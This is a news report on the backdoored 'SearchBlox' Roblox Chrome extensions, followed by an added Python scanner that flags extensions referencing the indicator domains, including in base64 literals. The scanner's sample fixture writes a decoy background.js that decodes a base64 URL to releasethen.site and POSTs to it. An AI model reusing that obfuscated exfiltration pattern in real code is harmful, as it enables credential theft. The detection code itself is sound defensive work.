Google Chrome extensions for Roblox contain a backdoor. More than 200,000 players are at risk.
BleepingComputer researchers have discovered that the "SearchBlox" Chrome browser extension, installed over 200,000 times, contains a backdoor that can steal Roblox credentials as well as assets on the Roblox Rolimons trading platform. According to the researchers, the backdoor was introduced either by the developer himself or during a compromise.
Searching for "SearchBlox" in Chrome returns two extensions. According to their descriptions, they allow you to "search Roblox servers for the right player instantly." The researchers' analysis showed that both contain a backdoor.
When decoded, the code exfiltrates the Roblox credentials to a second domain, "releasethen.site".
Notably, "searchblox.site" and "releasethen.site" were both registered in November with the same web host, Hostinger. The code also accesses the player's profile on Rolimons.
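Because the exfiltration string had to be decoded, a defender hunting for this kind of extension cannot rely on a plain text search for the domain. The following script is an added example (not code from the article or from BleepingComputer): it walks a Chrome-style unpacked extension tree (`Extensions/<id>/<version>/`), reads each extension's manifest and source files, and flags any file that references one of the indicator domains either in the clear or inside a base64 string literal. The two domains come from the report; the extension IDs, file names and the sample tree it builds are constructed for the demonstration.

```python
import base64
import json
import re
import tempfile
from pathlib import Path

# Indicator domains named in the report. No extension IDs are given there, so the
# scan keys on domains, not on IDs.
INDICATOR_DOMAINS = ("releasethen.site", "searchblox.site")

# File types worth reading inside an unpacked extension.
SCANNED_SUFFIXES = {".js", ".json", ".html"}

# Quoted string literals that look like base64. The report notes the exfiltration
# code had to be decoded, so a substring search on its own is not enough.
_B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")


def _decoded_literals(text):
    """Yield the decoded contents of base64-looking string literals in a source file."""
    for match in _B64_LITERAL.finditer(text):
        try:
            yield base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not really base64, skip it
            continue


def _find_domains(text, pattern):
    """Return {(domain, how)} for indicator domains found directly or inside base64 literals."""
    hits = {(m.group(0).lower(), "plain") for m in pattern.finditer(text)}
    for decoded in _decoded_literals(text):
        hits.update((m.group(0).lower(), "base64") for m in pattern.finditer(decoded))
    return hits


def scan_extensions(ext_root, domains=INDICATOR_DOMAINS):
    """Walk Extensions/<id>/<version>/ and report extensions referencing any indicator domain."""
    pattern = re.compile("|".join(re.escape(d) for d in domains), re.IGNORECASE)
    findings = []
    for manifest in sorted(Path(ext_root).glob("*/*/manifest.json")):
        version_dir = manifest.parent
        try:
            name = json.loads(manifest.read_text(encoding="utf-8")).get("name", "<unknown>")
        except (json.JSONDecodeError, OSError):
            name = "<unreadable manifest>"
        hits = []
        for path in sorted(version_dir.rglob("*")):
            if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
                text = path.read_text(encoding="utf-8", errors="replace")
                for domain, how in sorted(_find_domains(text, pattern)):
                    hits.append((path.relative_to(version_dir).as_posix(), domain, how))
        if hits:
            findings.append({"id": version_dir.parent.name, "name": name,
                             "version": version_dir.name, "hits": hits})
    return findings


def build_sample_tree(root):
    """Constructed sample: one benign extension and one that hides the exfiltration
    URL in a base64 literal and names the second indicator domain in a JSON file."""
    root = Path(root)
    benign = root / "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" / "1.0_0"   # constructed ID
    benign.mkdir(parents=True)
    (benign / "manifest.json").write_text(json.dumps({"name": "Benign Notes", "version": "1.0"}))
    (benign / "background.js").write_text('fetch("https://example.com/sync");\n')

    bad = root / "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" / "2.3_0"      # constructed ID
    bad.mkdir(parents=True)
    (bad / "manifest.json").write_text(json.dumps({"name": "Sample Search Helper", "version": "2.3"}))
    encoded = base64.b64encode(b"https://releasethen.site/collect").decode()
    (bad / "background.js").write_text(f'const u = atob("{encoded}");\nfetch(u, {{method: "POST"}});\n')
    (bad / "rules.json").write_text(json.dumps({"host": "https://searchblox.site/"}))
    return root


def demo():
    """Build the constructed tree in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_extensions(build_sample_tree(tmp))


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['id']} {finding['name']!r} v{finding['version']}")
        for rel, domain, how in finding["hits"]:
            print(f"  {rel}: {domain} ({how})")
```

To run it against a real profile, point `scan_extensions` at the profile's extension directory (for example `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions` on Windows or `~/.config/google-chrome/Default/Extensions` on Linux). A hit on a domain is a lead to investigate, not proof on its own, and an extension that builds its URL from concatenated fragments or a different encoding will still be missed, which is why the result also records the manifest name and version for a manual look.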
Whether the backdoor was introduced after the extension was compromised by an attacker or planted deliberately by the developer has yet to be established conclusively.
Some Roblox players noticed that the inventory of the user "Unstoppablelucent", allegedly the developer of the extension, grew overnight, and that the Rolimons account with the nickname "ccfont" was deleted on November 23 for "suspicious inventory transactions".
BleepingComputer has notified Google of the malicious extensions. A Google spokesperson confirmed that the extensions have been removed and will be automatically removed from the computers on which they were installed.